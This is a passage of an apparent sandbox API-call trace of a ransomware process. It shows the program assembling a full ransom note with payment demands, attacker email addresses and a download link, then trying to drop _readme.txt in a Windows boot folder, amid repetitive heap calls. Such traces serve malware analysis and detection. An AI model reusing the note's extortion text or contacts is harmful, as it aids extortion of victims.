hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" [0200.915] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48", lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0200.915] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b16180 [0200.915] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\_readme.txt" (normalized: "c:\\boot\\ru-ru\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0200.915] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0200.916] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0200.916] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0200.916] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0200.916] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0200.916] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0200.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0200.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0200.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0200.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0200.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.922] HeapFree (in: 